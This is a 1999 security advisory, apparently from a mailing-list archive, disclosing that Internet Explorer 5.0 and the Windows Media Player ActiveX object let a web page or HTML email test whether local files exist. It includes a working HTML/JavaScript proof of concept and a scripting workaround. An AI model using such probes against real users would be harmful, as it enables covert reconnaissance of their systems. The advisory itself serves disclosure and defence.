IE 5.0 and Windows Media Player ActiveX object allow checking the
existence of local files and directories
Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
Internet Explorer 5.0 under Windows 95 (guess other versions are
affected) and Windows Media Player ActiveX object allow checking the
existence of local files and directories.
This vulnerability may be exploited by HTML email or news group posting.
Details:
The problem is an error code returned by Windows Media Player ActiveX
object when a file is attempted to be opened.
Windows Media Player ActiveX object returns "-2147220970" error in the
ErrorCode property when a file or directory does not exist but is tried
to be opened.
The code is:
----------------------------------------------------------------------------------------
<object id="wm" WIDTH=0 HEIGHT=0
classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95"
>
</object>
<SCRIPT>
// -2147220970
function checkfile()
{
b=document.all.wm;
b.FileName=document.forms[0].elements[0].value;
if (b.ErrorCode == -2147220970)
alert("File does not exist")
else
alert("File exists");
}
</SCRIPT>
<FORM>
<INPUT TYPE="TEXT" VALUE="C:\AUTOEXEC.BAT" SIZE=60>
<INPUT TYPE="SUBMIT" VALUE="Check file" onclick="checkfile()">
</FORM>
----------------------------------------------------------------------------------------
Workaround:
Disable Active Scripting or Disable Script ActiveX Controls marked Safe
for Scripting
Demonstration is available at http://www.nat.bg/~joro/mscheckf.html
Copyright 1999 Georgi Guninski
Regards,
Georgi Guninski
http://www.nat.bg/~joro
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:12:15 PDT